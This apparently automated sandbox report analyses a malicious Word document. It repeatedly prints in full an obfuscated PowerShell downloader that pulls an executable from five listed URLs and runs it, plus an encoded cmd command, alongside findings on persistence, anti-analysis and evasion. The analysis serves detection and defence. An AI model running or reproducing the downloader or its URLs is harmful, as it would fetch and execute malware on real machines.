Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' FOR /F 'delims=f=wRb tokens=2' %U IN ('assoc.cmd') DO %U '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c assoc.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\968.exe 'C:\Users\user\AppData\Local\Temp\968.exe'
Source: C:\Users\user\AppData\Local\Temp\968.exe | Process created: C:\Users\user\AppData\Local\Temp\968.exe C:\Users\user\AppData\Local\Temp\968.exe
Source: C:\Windows\SysWOW64\startedradar.exe | Process created: C:\Windows\SysWOW64\startedradar.exe C:\Windows\SysWOW64\startedradar.exe
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32Jump to behavior
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeJump to behavior

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: PAY3646944800277778.doc | Stream path 'VBA/cazz' : High number of string operations
Suspicious powershell command line found
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_004B1A36 LoadLibraryA,GetProcAddress,12_2_004B1A36
PE file contains an invalid checksum
Source: 968.exe.11.dr | Static PE information: real checksum: 0x930e0ac3 should be: 0x2f63e
PE file contains sections with non-standard names
Source: 968.exe.11.dr | Static PE information: section name: .crt3
Source: 968.exe.11.dr | Static PE information: section name: .code
Source: 968.exe.11.dr | Static PE information: section name: .crt1
Source: 968.exe.11.dr | Static PE information: section name: .x
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_0040E047 pushfd ; retf 12_2_0040E04B
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_0040BC1B push edx; ret 12_2_0040BC1D
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_0040D2EF pushfd ; retf 12_2_0040D2FF
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_0040D884 push ecx; ret 12_2_0040D88B
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_0040C2BF push eax; ret 12_2_0040C2C0
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_0040D313 pushfd ; retf 12_2_0040D2FF
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_0040D7CD push edx; ret 12_2_0040D7D0
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_0040D3B1 push edx; rep ret 12_2_0040D3B2
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_004BBD22 push edi; retf 12_2_004BBD25
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 15_2_0040E047 pushfd ; retf 15_2_0040E04B
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 15_2_0040BC1B push edx; ret 15_2_0040BC1D
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 15_2_0040D2EF pushfd ; retf 15_2_0040D2FF
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 15_2_0040D884 push ecx; ret 15_2_0040D88B
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 15_2_0040C2BF push eax; ret 15_2_0040C2C0
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 15_2_0040D313 pushfd ; retf 15_2_0040D2FF
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 15_2_0040D7CD push edx; ret 15_2_0040D7D0
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 15_2_0040D3B1 push edx; rep ret 15_2_0040D3B2
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 16_2_0040E047 pushfd ; retf 16_2_0040E04B
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 16_2_0040BC1B push edx; ret 16_2_0040BC1D
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 16_2_0040D2EF pushfd ; retf 16_2_0040D2FF
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 16_2_0040D884 push ecx; ret 16_2_0040D88B
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 16_2_0040C2BF push eax; ret 16_2_0040C2C0
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 16_2_0040D313 pushfd ; retf 16_2_0040D2FF
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 16_2_0040D7CD push edx; ret 16_2_0040D7D0
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 16_2_0040D3B1 push edx; rep ret 16_2_0040D3B2
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_0040E047 pushfd ; retf 17_2_0040E04B
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_0040BC1B push edx; ret 17_2_0040BC1D
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_0040D2EF pushfd ; retf 17_2_0040D2FF
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_0040D884 push ecx; ret 17_2_0040D88B
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_0040C2BF push eax; ret 17_2_0040C2C0
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_0040D313 pushfd ; retf 17_2_0040D2FF

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\SysWOW64\startedradar.exe | Executable created and started: C:\Windows\SysWOW64\startedradar.exe
Tries to download and execute files (via powershell)
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\968.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\AppData\Local\Temp\968.exe | PE file moved: C:\Windows\SysWOW64\startedradar.exe

Boot Survival:

Contains functionality to start windows services
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E7FE71 StartServiceW,CloseServiceHandle,CloseServiceHandle,17_2_00E7FE71

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\968.exe | File opened: C:\Windows\SysWOW64\startedradar.exe:Zone.Identifier read attributes | delete
Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

Checks the free space of hard drives
Source: C:\Users\user\AppData\Local\Temp\968.exe | File volume queried: C:\ FullSizeInformation
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E5528C sldt word ptr [eax]
Contains functionality to enumerate running services
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: EnumServicesStatusExW,GetTickCount,OpenServiceW, 17_2_00E7FB9D
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: EnumServicesStatusExW,GetLastError, 17_2_00E7FB44
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1823
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1425
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1204 | Thread sleep count: 1823 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 956 | Thread sleep count: 1425 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4652 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2952 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4560 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1200 | Thread sleep time: -1844674407370954s >= -30000s
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: powershell.exe, 0000000B.00000002.4525389477.00000000056CB000.00000004.sdmp | Binary or memory string: Hyper-V
Source: powershell.exe, 0000000B.00000002.4537890827.0000000007FA0000.00000002.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: startedradar.exe, 00000011.00000003.5198344661.00000000005EE000.00000004.sdmp | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000B.00000002.4537890827.0000000007FA0000.00000002.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 0000000B.00000002.4537890827.0000000007FA0000.00000002.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmp | Binary or memory string: b:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 0000000B.00000002.4519980685.0000000003629000.00000004.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 0000000B.00000002.4537890827.0000000007FA0000.00000002.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processes
Source: C:\Windows\System32\svchost.exe | Process information queried: ProcessInformation

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | System information queried: KernelDebuggerInformation
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_00401C8E LdrGetProcedureAddress,LdrGetProcedureAddress
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_004B1A36 LoadLibraryA,GetProcAddress
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_004B1530 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_004B21B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E721B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\startedradar.exe | Code function: 17_2_00E71530 mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_004B1830 GetProcessHeap,HeapFree
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_004032C9 LogonUserW
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe CmD /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;14;51;75;65;14;78;25;6;77;66;24;11;20;7;20;58;23;20;42;23;47;51;
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' FOR /F 'delims=f=wRb tokens=2' %U IN ('assoc.cmd') DO %U '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c assoc.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\968.exe 'C:\Users\user\AppData\Local\Temp\968.exe'
Source: C:\Users\user\AppData\Local\Temp\968.exe | Process created: C:\Users\user\AppData\Local\Temp\968.exe C:\Users\user\AppData\Local\Temp\968.exe
Source: C:\Windows\SysWOW64\startedradar.exe | Process created: C:\Windows\SysWOW64\startedradar.exe C:\Windows\SysWOW64\startedradar.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;1
